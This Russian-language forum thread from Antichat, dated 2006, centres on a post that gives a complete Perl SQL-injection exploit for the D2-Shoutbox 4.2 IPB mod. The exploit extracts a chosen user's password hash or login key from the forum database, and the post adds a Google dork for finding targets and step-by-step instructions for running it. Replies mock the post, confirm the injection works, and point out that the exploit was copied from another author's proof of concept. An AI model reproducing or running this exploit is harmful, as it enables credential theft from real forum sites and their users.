ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости > Чаты
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

Взлов чата на Ipb
  #1  
Старый 13.05.2006, 10:42
Dracula4ever
Постоянный
Регистрация: 08.05.2006
Сообщений: 559
Провел на форуме:
1593567

Репутация: 354


Отправить сообщение для Dracula4ever с помощью ICQ Отправить сообщение для Dracula4ever с помощью AIM Отправить сообщение для Dracula4ever с помощью Yahoo
Post Взлов чата на Ipb

Ладно,сначало скачайте програму ActivePerl.
её можно скпчпть отсюда.

http://downloads.activestate.com/Act...x86-148120.msi


Теперь где вставляют тексты в той програме перепишите этот код:
Цитата:

#!/usr/bin/perl
################################################## #######
# _______ _______ ______ #
# |______ |______ | \ #
# ______| |______ |_____/ #
# #
#D2-Shoutbox 4.2(IPB Mod)<=SQL injection #
#Created By dracula4ever #
#ANTICHAT security Team #
#
#dracula4ever@walla.com#
#ISRAEL #
################################################## #######
#google:
#"Powered By D2-Shoutbox 4.2"
################################################## #######
use IO::Socket;
$host = $ARGV[0];
$user = $ARGV[2];
$uid = $ARGV[3];
$pid = $ARGV[4];
$type = $ARGV[5];

sub type()
{
if($type==1){$row="password";}
if($type==2){$row="member_login_key";}
else{print "Just 1 Or 2\n";exit();}
$sql="index.php?act=Shoutbox&view=saved&load=-1%20UNION%20SELECT%20null,null,null,null,".$row.", null,null,null%20FROM%20ibf_members%20where%20id=" .$user."/*";
$path = $ARGV[1].$sql;
}


sub header()
{
print q{
################################################## #####################
### D2-Shoutbox 4.2 SQL injection Exploit ###
### Tested On D2-Shoutbox 4.2 And IPB 2.4 ###
### Created By Dracula4ever, ANTICHAT Security Team ###
################################################## #####################
sedSB.pl [HOST] [DIR] [victim] [my id] [my md5 hash] [1-(1.*)/2-(2.*)]
sedSB.pl www.host.com /forum/ 2 4500 f3b8a336b250ee595dc6ef6bac38b647 2
################################################## #####################
}
}

sub sedsock()
{
$sedsock = IO::Socket::INET->new( Proto => "tcp", PeerAddr => $host, PeerPort => "80") || die "[-]Connect Failed\r\n";
print $sedsock "GET $path HTTP/1.1\n";
print $sedsock "Host: $host\n";
print $sedsock "Accept: */*\n";
print $sedsock "Cookie: member_id=$uid; pass_hash=$pid\n";
print $sedsock "Connection: close\n\n";
while($res = <$sedsock>){
$res =~ m/shout_s'>(.*?)<\/textarea>/ && print "[+]User: $user\n[+]Md5 Hash: $1\n";
}
}

if(@ARGV < 6){
header();
}else{
type();
sedsock();
}
Теперь сохраните это с названием ipb.pl в дисководе С:/
Теперь зайдите в CMD и напишите color a потом cd c:\ и потом cls и в конце напишите perl ipb.pl .

Надеюсь вам понравилось.
 
Ответить с цитированием

  #2  
Старый 13.05.2006, 10:49
LoFFi
Участник форума
Регистрация: 21.02.2006
Сообщений: 285
Провел на форуме:
1347867

Репутация: 408
Отправить сообщение для LoFFi с помощью ICQ
По умолчанию

=)))))))))))))))))))))))))
Я сначала даже не понял это =)))))))))
ЛОЛ. вот это пособие.........


Совет: Выложи какую нить багу или что нибудь в этом роде, а вот как ей пользоватся, мы то уж знаем, а те кто не знают, пусть и не лезут пока на бедные сайты.
ИМХО: Создавать отдельную тему не надо было =) Ты б еще в статьи затулил =)
 
Ответить с цитированием

  #3  
Старый 13.05.2006, 11:01
Dracula4ever
Постоянный
Регистрация: 08.05.2006
Сообщений: 559
Провел на форуме:
1593567

Репутация: 354


Отправить сообщение для Dracula4ever с помощью ICQ Отправить сообщение для Dracula4ever с помощью AIM Отправить сообщение для Dracula4ever с помощью Yahoo
По умолчанию

Если ты знаеш Perl тогда ты всё поймеш
 
Ответить с цитированием

  #4  
Старый 13.05.2006, 12:11
degeneration x
Познающий
Регистрация: 11.10.2005
Сообщений: 97
Провел на форуме:
732018

Репутация: 117
По умолчанию

D2-Shoutbox не столь популярен, и на форумы его почти не ставят.
 
Ответить с цитированием

  #5  
Старый 13.05.2006, 12:43
qBiN
Постоянный
Регистрация: 20.01.2005
Сообщений: 899
Провел на форуме:
1535446

Репутация: 182


Отправить сообщение для qBiN с помощью ICQ
По умолчанию

Цитата:
ANTICHAT Security Team
Паржал...Переправить следует...Во вторых чаты в чаты.
 
Ответить с цитированием

  #6  
Старый 13.05.2006, 12:50
max_pain89
Постоянный
Регистрация: 11.12.2004
Сообщений: 592
Провел на форуме:
2260903

Репутация: 345


По умолчанию

Цитата:
ANTICHAT security Team
Такая есть? Гг тут только группы.
 
Ответить с цитированием

  #7  
Старый 13.05.2006, 13:57
Rebz
Super Moderator
Регистрация: 08.11.2004
Сообщений: 3,395
Провел на форуме:
13166814

Репутация: 3876


По умолчанию

#Created By dracula4ever #
#ANTICHAT security Team #

Хаххаа))))))))) нда.. это сильно!
Не надо гнать на Шаутбокс..распространенная вещь -))

по теме - молоток.. инъекция работает..
 
Ответить с цитированием

  #8  
Старый 13.05.2006, 15:21
Zitt
Познавший АНТИЧАТ
Регистрация: 07.05.2006
Сообщений: 1,031
Провел на форуме:
5885100

Репутация: 773


Отправить сообщение для Zitt с помощью ICQ
По умолчанию

Но для отделной темы всёравно моловато!
 
Ответить с цитированием

  #9  
Старый 13.05.2006, 22:07
Rebz
Super Moderator
Регистрация: 08.11.2004
Сообщений: 3,395
Провел на форуме:
13166814

Репутация: 3876


По умолчанию

http://ivdb.org/poc/1337.htm
Так кто же истинный автор уязвимости??????

ps плохо не соблюдать чужие копирайты и переделывать их на свои

Последний раз редактировалось Rebz; 13.05.2006 в 22:11..
 
Ответить с цитированием

  #10  
Старый 13.05.2006, 22:14
.Slip
Leaders of Antichat - Level 4
Регистрация: 16.01.2006
Сообщений: 1,966
Провел на форуме:
21768337

Репутация: 3486


По умолчанию

Rebz, ты прям Шерлок Холмс
dracula4ever, стыдись ****
__________________
..

Последний раз редактировалось [sL1p]; 22.06.2007 в 12:04.. Причина: бгг
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Нашел исходники чата (интегрируется в форумы и cms: IPB, PhpBB, mambo и др.) TANZWUT Чаты 12 22.04.2006 16:09
Ник для Чата Чаты 2 11.04.2003 11:52
кАКАК ДОСАДИТЬ АДМИНУ ЧАТА Чаты 6 16.07.2002 23:28



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ